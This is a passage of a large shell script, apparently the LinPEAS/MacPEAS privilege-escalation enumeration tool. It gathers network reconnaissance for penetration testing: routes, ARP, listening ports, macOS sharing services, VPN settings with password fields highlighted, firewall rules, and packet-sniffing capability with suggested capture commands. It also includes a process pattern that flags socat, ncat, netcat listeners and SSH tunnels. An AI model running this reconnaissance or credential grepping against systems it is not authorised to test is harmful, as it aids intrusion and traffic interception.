   8126         echo -e "\nNetworkManager DNS settings:"
   8127         find /etc/NetworkManager -type f -name "*.conf" 2>/dev/null | while read -r conf; do
   8128             if grep -q "dns=" "$conf" 2>/dev/null; then
   8129                 echo "  From $conf:"
   8130                 grep "dns=" "$conf" 2>/dev/null | while read -r line; do
   8131                     echo "    $line"
   8132                 done
   8133             fi
   8134         done
   8135     fi
   8136     # Try to get DNS domain name
   8137     echo -e "\nDNS Domain Information:"
   8138     if command -v dnsdomainname >/dev/null 2>&1; then
   8139         warn_exec dnsdomainname 2>/dev/null
   8140     fi
   8141     if command -v domainname >/dev/null 2>&1; then
   8142         warn_exec domainname 2>/dev/null
   8143     fi
   8144     # Check for DNS cache status
   8145     if command -v systemd-resolve >/dev/null 2>&1; then
   8146         echo -e "\nDNS Cache Status (systemd-resolve):"
   8147         systemd-resolve --status 2>/dev/null | grep -A5 "DNS Servers" | grep -v "\-\-" | while read -r line; do
   8148             echo "  $line"
   8149         done
   8150     fi
   8151     echo ""
   8152 }
   8153 print_2title "Hostname, hosts and DNS" "T1016,T1018"
   8154 # Execute all information gathering functions
   8155 get_hostname_info
   8156 get_hosts_info
   8157 get_dns_info
   8158 
   8159 fi
   8160 
   8161 if check_mitre_filter "T1018,T1040"; then
   8162 # Function to parse routing information from /proc/net/route
   8163 parse_proc_route() {
   8164     print_3title "Routing Table (from /proc/net/route)" "T1018,T1040"
   8165     echo "Destination         Gateway         Genmask         Flags Metric Ref    Use Iface"
   8166     echo "--------------------------------------------------------------------------------"
   8167     # Skip header line and process each route
   8168     tail -n +2 /proc/net/route 2>/dev/null | while read -r line; do
   8169         if [ -n "$line" ]; then
   8170             # Extract fields
   8171             iface=$(echo "$line" | awk '{print $1}')
   8172             dest=$(printf "%d.%d.%d.%d" $(echo "$line" | awk '{printf "0x%s 0x%s 0x%s 0x%s", substr($2,7,2), substr($2,5,2), substr($2,3,2), substr($2,1,2)}'))
   8173             gw=$(printf "%d.%d.%d.%d" $(echo "$line" | awk '{printf "0x%s 0x%s 0x%s 0x%s", substr($3,7,2), substr($3,5,2), substr($3,3,2), substr($3,1,2)}'))
   8174             mask=$(printf "%d.%d.%d.%d" $(echo "$line" | awk '{printf "0x%s 0x%s 0x%s 0x%s", substr($4,7,2), substr($4,5,2), substr($4,3,2), substr($4,1,2)}'))
   8175             flags=$(echo "$line" | awk '{print $5}')
   8176             metric=$(echo "$line" | awk '{print $6}')
   8177             ref=$(echo "$line" | awk '{print $7}')
   8178             use=$(echo "$line" | awk '{print $8}')
   8179             # Print formatted output
   8180             printf "%-18s %-15s %-15s %-6s %-6s %-6s %-6s %s\n" "$dest" "$gw" "$mask" "$flags" "$metric" "$ref" "$use" "$iface"
   8181         fi
   8182     done
   8183     echo ""
   8184 }
   8185 # Function to parse ARP information from /proc/net/arp
   8186 parse_proc_arp() {
   8187     print_3title "ARP Table (from /proc/net/arp)" "T1018,T1040"
   8188     echo "IP address       HW type     Flags     HW address           Mask     Device"
   8189     echo "------------------------------------------------------------------------"
   8190     # Skip header line and process each ARP entry
   8191     tail -n +2 /proc/net/arp 2>/dev/null | while read -r line; do
   8192         if [ -n "$line" ]; then
   8193             ip=$(echo "$line" | awk '{print $1}')
   8194             hwtype=$(echo "$line" | awk '{print $2}')
   8195             flags=$(echo "$line" | awk '{print $3}')
   8196             hwaddr=$(echo "$line" | awk '{print $4}')
   8197             mask=$(echo "$line" | awk '{print $5}')
   8198             device=$(echo "$line" | awk '{print $6}')
   8199             # Print formatted output
   8200             printf "%-15s %-11s %-9s %-18s %-8s %s\n" "$ip" "$hwtype" "$flags" "$hwaddr" "$mask" "$device"
   8201         fi
   8202     done
   8203     echo ""
   8204 }
   8205 # Function to get network neighbors information
   8206 get_network_neighbors() {
   8207     print_2title "Networks and neighbours" "T1018,T1040"
   8208     # Get routing information
   8209     print_3title "Routing Information" "T1018,T1040"
   8210     if [ "$MACPEAS" ]; then
   8211         # macOS specific
   8212         if command -v netstat >/dev/null 2>&1; then
   8213             netstat -rn 2>/dev/null
   8214         else
   8215             echo "No routing information available"
   8216         fi
   8217     else
   8218         # Linux systems
   8219         if command -v ip >/dev/null 2>&1; then
   8220             ip route 2>/dev/null
   8221             echo -e "\nNeighbor table:"
   8222             ip neigh 2>/dev/null
   8223         elif command -v route >/dev/null 2>&1; then
   8224             route -n 2>/dev/null
   8225         elif [ -f "/proc/net/route" ]; then
   8226             parse_proc_route
   8227         else
   8228             echo "No routing information available"
   8229         fi
   8230     fi
   8231     # Get ARP information
   8232     print_3title "ARP Information" "T1018,T1040"
   8233     if command -v arp >/dev/null 2>&1; then
   8234         if [ "$MACPEAS" ]; then
   8235             arp -a 2>/dev/null
   8236         else
   8237             arp -e 2>/dev/null || arp -a 2>/dev/null
   8238         fi
   8239     elif [ -f "/proc/net/arp" ]; then
   8240         parse_proc_arp
   8241     else
   8242         echo "No ARP information available"
   8243     fi
   8244     # Additional neighbor discovery methods
   8245     print_3title "Additional Neighbor Information" "T1018,T1040"
   8246     # Check for IPv6 neighbors if available
   8247     if [ -f "/proc/net/ipv6_neigh" ]; then
   8248         echo "IPv6 Neighbors:"
   8249         cat /proc/net/ipv6_neigh 2>/dev/null | grep -v "^IP" | while read -r line; do
   8250             if [ -n "$line" ]; then
   8251                 echo "  $line"
   8252             fi
   8253         done
   8254     fi
   8255     # Try to get LLDP neighbors if available
   8256     if command -v lldpctl >/dev/null 2>&1; then
   8257         echo -e "\nLLDP Neighbors:"
   8258         lldpctl 2>/dev/null | grep -A2 "Interface:" | while read -r line; do
   8259             echo "  $line"
   8260         done
   8261     fi
   8262     # Try to get CDP neighbors if available
   8263     if command -v cdp >/dev/null 2>&1; then
   8264         echo -e "\nCDP Neighbors:"
   8265         cdp 2>/dev/null | grep -v "^$" | while read -r line; do
   8266             echo "  $line"
   8267         done
   8268     fi
   8269     echo ""
   8270 }
   8271 if [ "$EXTRA_CHECKS" ]; then
   8272     get_network_neighbors
   8273 fi
   8274 
   8275 fi
   8276 
   8277 if check_mitre_filter "T1049"; then
   8278 # Function to get process info from inode
   8279 get_process_info() {
   8280     local inode=$1
   8281     local pid=""
   8282     local program=""
   8283     if [ -n "$inode" ]; then
   8284         for pid_dir in /proc/[0-9]*/fd; do
   8285             if [ -d "$pid_dir" ]; then
   8286                 if ls -l "$pid_dir" 2>/dev/null | grep -q "$inode"; then
   8287                     pid=$(echo "$pid_dir" | awk -F/ '{print $3}')
   8288                     if [ -f "/proc/$pid/cmdline" ]; then
   8289                         program=$(tr '\0' ' ' < "/proc/$pid/cmdline" | cut -d' ' -f1)
   8290                         program=$(basename "$program")
   8291                     fi
   8292                     break
   8293                 fi
   8294             fi
   8295         done
   8296     fi
   8297     echo "$pid/$program"
   8298 }
   8299 # Function to parse /proc/net/tcp and /proc/net/udp files
   8300 parse_proc_net_ports() {
   8301     local proto=$1
   8302     local proc_file="/proc/net/$proto"
   8303     local header="Proto  Recv-Q  Send-Q  Local Address          Foreign Address        State       PID/Program name"
   8304     local header_sep="--------------------------------------------------------------------------------"
   8305     if [ -f "$proc_file" ]; then
   8306         print_3title "Active $proto Ports (from /proc/net/$proto)" "T1049"
   8307         echo "$header"
   8308         echo "$header_sep"
   8309         # Process each connection using a pipe
   8310         tail -n +2 "$proc_file" 2>/dev/null | while IFS= read -r line; do
   8311             [ -z "$line" ] && continue
   8312             # Skip header
   8313             case "$line" in
   8314                 *"sl"*) continue ;;
   8315                 *) : ;;
   8316             esac
   8317             # Extract fields using awk
   8318             sl=$(echo "$line" | awk '{print $1}')
   8319             local_addr=$(echo "$line" | awk '{print $2}')
   8320             rem_addr=$(echo "$line" | awk '{print $3}')
   8321             st=$(echo "$line" | awk '{print $4}')
   8322             tx_queue=$(echo "$line" | awk '{print $5}')
   8323             rx_queue=$(echo "$line" | awk '{print $6}')
   8324             uid=$(echo "$line" | awk '{print $7}')
   8325             inode=$(echo "$line" | awk '{print $10}')
   8326             # Convert hex IP:port to decimal
   8327             local_ip=$(printf "%d.%d.%d.%d" $(echo "$local_addr" | awk -F: '{printf "0x%s 0x%s 0x%s 0x%s", substr($1,7,2), substr($1,5,2), substr($1,3,2), substr($1,1,2)}'))
   8328             local_port=$(printf "%d" "0x$(echo "$local_addr" | awk -F: '{print $2}')")
   8329             rem_ip=$(printf "%d.%d.%d.%d" $(echo "$rem_addr" | awk -F: '{printf "0x%s 0x%s 0x%s 0x%s", substr($1,7,2), substr($1,5,2), substr($1,3,2), substr($1,1,2)}'))
   8330             rem_port=$(printf "%d" "0x$(echo "$rem_addr" | awk -F: '{print $2}')")
   8331             # Get process information
   8332             proc_info=$(get_process_info "$inode")
   8333             # Get state name
   8334             case $st in
   8335                 "01") state="ESTABLISHED" ;;
   8336                 "02") state="SYN_SENT" ;;
   8337                 "03") state="SYN_RECV" ;;
   8338                 "04") state="FIN_WAIT1" ;;
   8339                 "05") state="FIN_WAIT2" ;;
   8340                 "06") state="TIME_WAIT" ;;
   8341                 "07") state="CLOSE" ;;
   8342                 "08") state="CLOSE_WAIT" ;;
   8343                 "09") state="LAST_ACK" ;;
   8344                 "0A") state="LISTEN" ;;
   8345                 "0B") state="CLOSING" ;;
   8346                 "0C") state="NEW_SYN_RECV" ;;
   8347                 *) state="UNKNOWN" ;;
   8348             esac
   8349             # Only show listening ports
   8350             if [ "$state" = "LISTEN" ]; then
   8351                 # Format the output
   8352                 printf "%-6s %-8s %-8s %-21s %-21s %-12s %s\n" \
   8353                     "$proto" "$rx_queue" "$tx_queue" "$local_ip:$local_port" "$rem_ip:$rem_port" "$state" "$proc_info"
   8354             fi
   8355         done
   8356     fi
   8357     echo ""
   8358 }
   8359 # Function to get open ports information
   8360 get_open_ports() {
   8361     print_2title "Active Ports" "T1049"
   8362     print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#open-ports"
   8363     # Try standard tools first
   8364     if command -v netstat >/dev/null 2>&1; then
   8365         print_3title "Active Ports (netstat)" "T1049"
   8366         netstat -punta 2>/dev/null | grep -i listen | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED},g"
   8367     elif command -v ss >/dev/null 2>&1; then
   8368         print_3title "Active Ports (ss)" "T1049"
   8369         ss -nltpu 2>/dev/null | grep -i listen | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED},g"
   8370     else
   8371         # Fallback to parsing /proc/net files
   8372         parse_proc_net_ports "tcp"
   8373         parse_proc_net_ports "udp"
   8374     fi
   8375     # Focused local service exposure view
   8376     print_3title "Local-only listeners (loopback)" "T1049"
   8377     if command -v ss >/dev/null 2>&1; then
   8378         ss -nltpu 2>/dev/null | grep -E "127\.0\.0\.1:|::1:" | sed -${E} "s,127\.0\.0\.1:|::1:,${SED_RED},g"
   8379     elif command -v netstat >/dev/null 2>&1; then
   8380         netstat -punta 2>/dev/null | grep -i listen | grep -E "127\.0\.0\.1:|::1:" | sed -${E} "s,127\.0\.0\.1:|::1:,${SED_RED},g"
   8381     fi
   8382     print_3title "Unique listener bind addresses" "T1049"
   8383     if command -v ss >/dev/null 2>&1; then
   8384         ss -nltpuH 2>/dev/null | awk '{
   8385             a=$5
   8386             if (a ~ /^\[/) {
   8387                 sub(/^\[/, "", a)
   8388                 sub(/\]:[0-9]+$/, "", a)
   8389             } else if (a ~ /:[0-9]+$/) {
   8390                 sub(/:[0-9]+$/, "", a)
   8391             }
   8392             sub(/^::ffff:/, "", a)
   8393             if (a != "") print a
   8394         }' | sort -u | sed -${E} "s,127\.0\.0\.1|::1,${SED_RED},g"
   8395     elif command -v netstat >/dev/null 2>&1; then
   8396         netstat -punta 2>/dev/null | grep -i listen | awk '{
   8397             a=$4
   8398             if (a ~ /^\[/) {
   8399                 sub(/^\[/, "", a)
   8400                 sub(/\]:[0-9]+$/, "", a)
   8401             } else if (a ~ /:[0-9]+$/) {
   8402                 sub(/:[0-9]+$/, "", a)
   8403             }
   8404             if (a == ":::" ) a="::"
   8405             sub(/^::ffff:/, "", a)
   8406             if (a != "") print a
   8407         }' | sort -u | sed -${E} "s,127\.0\.0\.1|::1,${SED_RED},g"
   8408     fi
   8409     print_3title "Potential local forwarders/relays" "T1049"
   8410     ps aux 2>/dev/null | grep -E "[s]ocat|[s]sh .*(-L|-R|-D)|[n]cat|[n]c .*-l" | sed -${E} "s,socat|ssh|-L|-R|-D|ncat|nc,${SED_RED_YELLOW},g"
   8411     # Additional port information
   8412     if [ "$EXTRA_CHECKS" ] || [ "$DEBUG" ]; then
   8413         print_3title "Additional Port Information" "T1049"
   8414         # Check for listening ports in /proc/net/unix
   8415         if [ -f "/proc/net/unix" ]; then
   8416             echo "Unix Domain Sockets:"
   8417             # Use awk to process the file in one go, avoiding duplicates and empty paths
   8418             awk '$8 != "" && $8 != "@" && $8 != "00000000" {
   8419                 inode=$7
   8420                 socket=$8
   8421                 # Find process using inode
   8422                 cmd="find /proc/[0-9]*/fd -ls 2>/dev/null | grep " inode " | head -n1 | awk \"{print \\$11}\" | xargs -r readlink"
   8423                 pid=""
   8424                 while (cmd | getline pid_dir) {
   8425                     if (pid_dir != "") {
   8426                         split(pid_dir, parts, "/")
   8427                         pid=parts[3]
   8428                         break
   8429                     }
   8430                 }
   8431                 close(cmd)
   8432                 if (pid != "") {
   8433                     cmd="tr \\0 \" \" < /proc/" pid "/cmdline 2>/dev/null | cut -d\" \" -f1 | xargs -r basename"
   8434                     cmd | getline prog
   8435                     close(cmd)
   8436                     if (prog != "") {
   8437                         print "  " socket " (" pid "/" prog ")"
   8438                     } else {
   8439                         print "  " socket " (" pid ")"
   8440                     }
   8441                 } else {
   8442                     print "  " socket
   8443                 }
   8444             }' /proc/net/unix 2>/dev/null | sort -u
   8445         fi
   8446         # Check for ports in use by systemd
   8447         if command -v systemctl >/dev/null 2>&1; then
   8448             echo -e "\nSystemd Socket Units:"
   8449             systemctl list-sockets 2>/dev/null | while IFS= read -r line; do
   8450                 [ -z "$line" ] && continue
   8451                 if ! echo "$line" | grep -q "UNIT\|listed"; then
   8452                     echo "  $line"
   8453                 fi
   8454             done
   8455         fi
   8456     fi
   8457     echo ""
   8458 }
   8459 get_open_ports
   8460 
   8461 fi
   8462 
   8463 if check_mitre_filter "T1016"; then
   8464 # Function to get network capabilities information
   8465 get_macos_network_capabilities() {
   8466     print_2title "Network Capabilities" "T1016"
   8467     # Basic network information
   8468     echo ""
   8469     print_3title "Network Interfaces and Configuration" "T1016"
   8470     warn_exec system_profiler SPNetworkDataType
   8471     # Network locations
   8472     echo ""
   8473     print_3title "Network Locations" "T1016"
   8474     warn_exec system_profiler SPNetworkLocationDataType
   8475     # Network extensions
   8476     echo ""
   8477     print_3title "Network Extensions" "T1016"
   8478     if [ -d "/Library/SystemExtensions" ]; then
   8479         warn_exec systemextensionsctl list
   8480     fi
   8481     # Network security
   8482     echo ""
   8483     print_3title "Network Security" "T1016"
   8484     if command -v networksetup >/dev/null 2>&1; then
   8485         echo "Firewall Status:"
   8486         warn_exec networksetup -getglobalstate
   8487         echo -e "\nFirewall Rules:"
   8488         warn_exec networksetup -listallnetworkservices | while read -r net_service; do
   8489             if [ -n "$net_service" ]; then
   8490                 echo "Service: $net_service"
   8491                 warn_exec networksetup -getwebproxy "$net_service"
   8492                 warn_exec networksetup -getsecurewebproxy "$net_service"
   8493                 warn_exec networksetup -getproxybypassdomains "$net_service"
   8494             fi
   8495         done
   8496     fi
   8497     # Additional network information if EXTRA_CHECKS is enabled
   8498     if [ "$EXTRA_CHECKS" ]; then
   8499         # Network preferences
   8500         echo ""
   8501         print_3title "Network Preferences" "T1016"
   8502         if [ -f "/Library/Preferences/SystemConfiguration/preferences.plist" ]; then
   8503             warn_exec plutil -p /Library/Preferences/SystemConfiguration/preferences.plist | grep -A 5 "NetworkServices"
   8504         fi
   8505         # Network statistics
   8506         echo ""
   8507         print_3title "Network Statistics" "T1016"
   8508         warn_exec netstat -s
   8509         # Network routes
   8510         echo ""
   8511         print_3title "Network Routes" "T1016"
   8512         warn_exec netstat -rn
   8513         # Network interfaces details
   8514         echo ""
   8515         print_3title "Network Interfaces Details" "T1016"
   8516         warn_exec ifconfig -a
   8517         # Network kernel extensions
   8518         echo ""
   8519         print_3title "Network Kernel Extensions" "T1016"
   8520         warn_exec kextstat | grep -i network
   8521     fi
   8522     echo ""
   8523 }
   8524 if [ "$MACPEAS" ]; then
   8525     get_macos_network_capabilities
   8526 fi
   8527 
   8528 fi
   8529 
   8530 if check_mitre_filter "T1016"; then
   8531 # Function to check if a port is listening
   8532 check_listening_port() {
   8533     local port=$1
   8534     local service=$2
   8535     local count=0
   8536     # Check both IPv4 and IPv6
   8537     count=$(netstat -na 2>/dev/null | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.${port}" | wc -l)
   8538     echo "$count"
   8539 }
   8540 # Function to get sharing services status
   8541 get_sharing_services_status() {
   8542     print_2title "MacOS Sharing Services Status" "T1016"
   8543     # Define services and their ports using parallel arrays
   8544     services="Screen Sharing File Sharing Remote Login Remote Management Remote Apple Events Back to My Mac AirPlay Receiver AirDrop Bonjour Printer Sharing Internet Sharing"
   8545     ports="5900 88,445,548 22 3283 3031 4488 7000 5353 5353 515,631 67,68"
   8546     # Check each service
   8547     echo "Service Status (0=OFF, >0=ON):"
   8548     echo "--------------------------------"
   8549     # Get number of services
   8550     service_count=$(echo "$services" | wc -w)
   8551     # Loop through services using index
   8552     i=1
   8553     while [ $i -le $service_count ]; do
   8554         sharing_service=$(echo "$services" | cut -d' ' -f$i)
   8555         port_list=$(echo "$ports" | cut -d' ' -f$i)
   8556         total=0
   8557         active_ports=""
   8558         # Check each port for the service
   8559         port1=$(echo "$port_list" | cut -d',' -f1)
   8560         port2=$(echo "$port_list" | cut -d',' -f2)
   8561         port3=$(echo "$port_list" | cut -d',' -f3)
   8562         for port in $port1 $port2 $port3; do
   8563             if [ -n "$port" ]; then
   8564                 count=$(check_listening_port "$port" "$sharing_service")
   8565                 if [ "$count" -gt 0 ]; then
   8566                     total=$((total + count))
   8567                     if [ -n "$active_ports" ]; then
   8568                         active_ports="${active_ports},"
   8569                     fi
   8570                     active_ports="${active_ports}${port}"
   8571                 fi
   8572             fi
   8573         done
   8574         # Print service status
   8575         if [ "$total" -gt 0 ]; then
   8576             printf "%-20s: ON  (Ports: %s)\n" "$sharing_service" "$active_ports" | sed -${E} "s,ON.*,${SED_RED},g"
   8577         else
   8578             printf "%-20s: OFF\n" "$sharing_service"
   8579         fi
   8580         i=$((i + 1))
   8581     done
   8582     echo ""
   8583 }
   8584 # Function to get VPN information
   8585 get_vpn_info() {
   8586     print_3title "VPN Information" "T1016"
   8587     # Get VPN configurations
   8588     warn_exec system_profiler SPNetworkLocationDataType | grep -A 5 -B 7 ": Password" | sed -${E} "s,Password|Authorization Name.*,${SED_RED},g"
   8589     # Check for VPN profiles
   8590     if [ -d "/Library/Preferences/SystemConfiguration" ]; then
   8591         echo -e "\nVPN Profiles:"
   8592         find /Library/Preferences/SystemConfiguration -name "*.plist" -exec grep -l "VPN" {} \; 2>/dev/null | while read -r profile; do
   8593             echo "Profile: $profile"
   8594             warn_exec plutil -p "$profile" | grep -A 5 "VPN"
   8595         done
   8596     fi
   8597     echo ""
   8598 }
   8599 # Function to get firewall information
   8600 get_firewall_info() {
   8601     print_3title "Firewall Information" "T1016"
   8602     # Get firewall status
   8603     warn_exec system_profiler SPFirewallDataType
   8604     # Get application firewall rules
   8605     if command -v /usr/libexec/ApplicationFirewall/socketfilterfw >/dev/null 2>&1; then
   8606         echo -e "\nApplication Firewall Rules:"
   8607         warn_exec /usr/libexec/ApplicationFirewall/socketfilterfw --listapps
   8608     fi
   8609     # Get pf firewall rules if available
   8610     if command -v pfctl >/dev/null 2>&1; then
   8611         echo -e "\nPF Firewall Rules:"
   8612         warn_exec pfctl -s rules 2>/dev/null
   8613     fi
   8614     echo ""
   8615 }
   8616 # Function to get additional network information
   8617 get_additional_network_info() {
   8618     if [ "$EXTRA_CHECKS" ]; then
   8619         print_3title "Additional Network Information" "T1016"
   8620         # Bluetooth information
   8621         echo "Bluetooth Status:"
   8622         warn_exec system_profiler SPBluetoothDataType
   8623         # Ethernet information
   8624         echo -e "\nEthernet Status:"
   8625         warn_exec system_profiler SPEthernetDataType
   8626         # USB network adapters
   8627         echo -e "\nUSB Network Adapters:"
   8628         warn_exec system_profiler SPUSBDataType
   8629         # Network kernel extensions
   8630         echo -e "\nNetwork Kernel Extensions:"
   8631         warn_exec kextstat | grep -i "network\|ethernet\|wifi\|bluetooth"
   8632         # Network daemons
   8633         echo -e "\nNetwork Daemons:"
   8634         warn_exec launchctl list | grep -i "network\|vpn\|firewall\|sharing"
   8635     fi
   8636     echo ""
   8637 }
   8638 # Main function to get all network services information
   8639 get_macos_network_services() {
   8640     if [ "$MACPEAS" ]; then
   8641         # Get sharing services status
   8642         get_sharing_services_status
   8643         # Get VPN information
   8644         get_vpn_info
   8645         # Get firewall information
   8646         get_firewall_info
   8647         # Get additional network information if EXTRA_CHECKS is enabled
   8648         get_additional_network_info
   8649     fi
   8650 }
   8651 if [ "$MACPEAS" ]; then
   8652     get_macos_network_services
   8653 fi
   8654 
   8655 fi
   8656 
   8657 if check_mitre_filter "T1040"; then
   8658 # Function to check if a command exists and is executable
   8659 check_command() {
   8660     local cmd=$1
   8661     if command -v "$cmd" >/dev/null 2>&1; then
   8662         if [ -x "$(command -v "$cmd")" ]; then
   8663             return 0
   8664         fi
   8665     fi
   8666     return 1
   8667 }
   8668 # Function to check if we can sniff on an interface
   8669 check_interface_sniffable() {
   8670     local iface=$1
   8671     if check_command tcpdump; then
   8672         if timeout 1 tcpdump -i "$iface" -c 1 >/dev/null 2>&1; then
   8673             return 0
   8674         fi
   8675     elif check_command dumpcap; then
   8676         dumpcap_test_file="/tmp/.linpeas_dumpcap_test_$$.pcap"
   8677         if timeout 2 dumpcap -i "$iface" -c 1 -q -w "$dumpcap_test_file" >/dev/null 2>&1; then
   8678             rm -f "$dumpcap_test_file" 2>/dev/null
   8679             return 0
   8680         fi
   8681         rm -f "$dumpcap_test_file" 2>/dev/null
   8682     fi
   8683     return 1
   8684 }
   8685 # Function to check for promiscuous mode
   8686 check_promiscuous_mode() {
   8687     local iface=$1
   8688     if ip link show "$iface" 2>/dev/null | grep -q "PROMISC"; then
   8689         return 0
   8690     fi
   8691     return 1
   8692 }
   8693 # Main function to check network traffic analysis capabilities
   8694 check_network_traffic_analysis() {
   8695     print_2title "Network Traffic Analysis Capabilities" "T1040"
   8696     # Check for sniffing tools
   8697     echo ""
   8698     print_3title "Available Sniffing Tools" "T1040"
   8699     tools_found=0
   8700     if check_command tcpdump; then
   8701         echo "tcpdump is available" | sed -${E} "s,.*,${SED_GREEN},g"
   8702         tools_found=1
   8703         # Check tcpdump version and capabilities
   8704         warn_exec tcpdump --version 2>/dev/null | head -n 1
   8705         getcap "$(command -v tcpdump)" 2>/dev/null
   8706     fi
   8707     if check_command dumpcap; then
   8708         echo "dumpcap is available" | sed -${E} "s,.*,${SED_GREEN},g"
   8709         tools_found=1
   8710         warn_exec dumpcap --version 2>/dev/null | head -n 1
   8711         getcap "$(command -v dumpcap)" 2>/dev/null
   8712         if id -nG 2>/dev/null | grep -qw wireshark; then
   8713             echo "Current user is in wireshark group" | sed -${E} "s,.*,${SED_GREEN},g"
   8714         elif getent group wireshark >/dev/null 2>&1; then
   8715             echo "wireshark group exists but current user is not in it" | sed -${E} "s,.*,${SED_RED_YELLOW},g"
   8716         fi
   8717     fi
   8718     if check_command tshark; then
   8719         echo "tshark is available" | sed -${E} "s,.*,${SED_GREEN},g"
   8720         tools_found=1
   8721         # Check tshark version
   8722         warn_exec tshark --version 2>/dev/null | head -n 1
   8723     fi
   8724     if check_command wireshark; then
   8725         echo "wireshark is available" | sed -${E} "s,.*,${SED_GREEN},g"
   8726         tools_found=1
   8727     fi
   8728     if check_command ngrep; then
   8729         echo "ngrep is available" | sed -${E} "s,.*,${SED_GREEN},g"
   8730         tools_found=1
   8731     fi
   8732     if check_command tcpflow; then
   8733         echo "tcpflow is available" | sed -${E} "s,.*,${SED_GREEN},g"
   8734         tools_found=1
   8735     fi
   8736     if [ $tools_found -eq 0 ]; then
   8737         echo "No sniffing tools found" | sed -${E} "s,.*,${SED_RED},g"
   8738     fi
   8739     if check_command tcpdump; then
   8740         echo "Sniffable interfaces according to tcpdump -D:"
   8741         timeout 2 tcpdump -D 2>/dev/null
   8742     elif check_command dumpcap; then
   8743         echo "Sniffable interfaces according to dumpcap -D:"
   8744         timeout 2 dumpcap -D 2>/dev/null
   8745     fi
   8746     # Check network interfaces
   8747     echo ""
   8748     print_3title "Network Interfaces Sniffing Capabilities" "T1040"
   8749     interfaces_found=0
   8750     # Get list of network interfaces
   8751     if command -v ip >/dev/null 2>&1; then
   8752         interfaces=$(ip -o link show | awk -F': ' '{print $2}')
   8753     elif command -v ifconfig >/dev/null 2>&1; then
   8754         interfaces=$(ifconfig -a | grep -o '^[^ ]*:' | tr -d ':')
   8755     else
   8756         interfaces=$(ls /sys/class/net/ 2>/dev/null)
   8757     fi
   8758     for iface in $interfaces; do
   8759         if [ "$iface" = "lo" ]; then
   8760             echo -n "Interface $iface (loopback): "
   8761         else
   8762             echo -n "Interface $iface: "
   8763         fi
   8764         if check_interface_sniffable "$iface"; then
   8765             echo "Sniffable" | sed -${E} "s,.*,${SED_GREEN},g"
   8766             interfaces_found=1
   8767             # Check promiscuous mode
   8768             if [ "$iface" != "lo" ] && check_promiscuous_mode "$iface"; then
   8769                 echo "  - Promiscuous mode enabled" | sed -${E} "s,.*,${SED_RED},g"
   8770             fi
   8771             # Get interface details
   8772             if [ "$EXTRA_CHECKS" ]; then
   8773                 echo "  - Interface details:"
   8774                 warn_exec ip addr show "$iface" 2>/dev/null || ifconfig "$iface" 2>/dev/null
   8775             fi
   8776         else
   8777             echo "Not sniffable" | sed -${E} "s,.*,${SED_RED},g"
   8778         fi
   8779     done
   8780     if [ $interfaces_found -eq 0 ]; then
   8781         echo "No sniffable interfaces found" | sed -${E} "s,.*,${SED_RED},g"
   8782     fi
   8783     # Check for sensitive traffic patterns if we have sniffing capabilities
   8784     if [ $tools_found -eq 1 ] && [ $interfaces_found -eq 1 ]; then
   8785         echo ""
   8786         print_3title "Sensitive Traffic Detection" "T1040"
   8787         print_info "Checking for common sensitive traffic patterns..."
   8788         # List of sensitive traffic patterns to check
   8789         patterns="
   8790             - HTTP Basic Auth
   8791             - FTP credentials
   8792             - SMTP credentials
   8793             - MySQL/MariaDB traffic
   8794             - PostgreSQL traffic
   8795             - Redis traffic
   8796             - MongoDB traffic
   8797             - LDAP traffic
   8798             - SMB traffic
   8799             - DNS queries
   8800             - SNMP traffic
   8801             - Many more...
   8802         "
   8803         echo "$patterns" | while read -r pattern; do
   8804             if [ -n "$pattern" ]; then
   8805                 echo "$pattern"
   8806             fi
   8807         done
   8808         print_info "To capture sensitive traffic, you can use:"
   8809         echo "tcpdump -i <interface> -w capture.pcap" | sed -${E} "s,.*,${SED_GREEN},g"
   8810         echo "tshark -i <interface> -w capture.pcap" | sed -${E} "s,.*,${SED_GREEN},g"
   8811         echo "dumpcap -i <interface> -w capture.pcap" | sed -${E} "s,.*,${SED_GREEN},g"
   8812     fi
   8813     echo ""
   8814     print_3title "Running sniffing/traffic reconstruction processes" "T1040"
   8815     ps aux 2>/dev/null | grep -E "[t]cpdump|[d]umpcap|[t]shark|[w]ireshark|[n]grep|[t]cpflow" | sed -${E} "s,.*,${SED_RED_YELLOW},g"
   8816     # Additional information
   8817     if [ "$EXTRA_CHECKS" ]; then
   8818         echo ""
   8819         print_3title "Additional Network Analysis Information" "T1040"
   8820         # Check for network monitoring tools
   8821         echo "Checking for network monitoring tools..."
   8822         for tool in nethogs iftop iotop nload bmon; do
   8823             if check_command "$tool"; then
   8824                 echo "$tool is available" | sed -${E} "s,.*,${SED_GREEN},g"
   8825             fi
   8826         done
   8827     fi
   8828     echo ""
   8829 }
   8830 # Run the main function
   8831 check_network_traffic_analysis
   8832 
   8833 fi
   8834 
   8835 if check_mitre_filter "T1016"; then
   8836 # Function to check if a command exists and is executable
   8837 check_command() {
   8838     local cmd=$1
   8839     if command -v "$cmd" >/dev/null 2>&1; then
   8840         if [ -x "$(command -v "$cmd")" ]; then
   8841             return 0
   8842         fi
   8843     fi
   8844     return 1
   8845 }
   8846 # Function to analyze iptables rules
   8847 analyze_iptables() {
   8848     echo ""
   8849     print_3title "Iptables Rules" "T1016"
   8850     # Check if iptables is available
   8851     if ! check_command iptables; then
   8852         echo_not_found "iptables"
   8853         return
   8854     fi
   8855     # Check if we have permission to list rules
   8856     if ! timeout 1 iptables -L >/dev/null 2>&1; then
   8857         echo "No permission to list iptables rules" | sed -${E} "s,.*,${SED_RED},g"
   8858         return
   8859     fi
   8860     # Get iptables version
   8861     warn_exec iptables --version 2>/dev/null
   8862     # List all chains and rules
   8863     echo -e "\nFilter Table Rules:"
   8864     warn_exec iptables -L -v -n 2>/dev/null
   8865     echo -e "\nNAT Table Rules:"
   8866     warn_exec iptables -t nat -L -v -n 2>/dev/null
   8867     echo -e "\nMangle Table Rules:"
   8868     warn_exec iptables -t mangle -L -v -n 2>/dev/null
   8869     # Check for custom chains
   8870     echo -e "\nCustom Chains:"
   8871     warn_exec iptables -L -v -n | grep -E "^Chain [A-Za-z]" | grep -v "INPUT\|OUTPUT\|FORWARD\|PREROUTING\|POSTROUTING" 2>/dev/null
   8872     # Check for saved rules
   8873     echo -e "\nSaved Rules:"
   8874     for rules_file in /etc/iptables/* /etc/iptables/rules.v4 /etc/iptables/rules.v6 /etc/iptables-save /etc/iptables.save; do
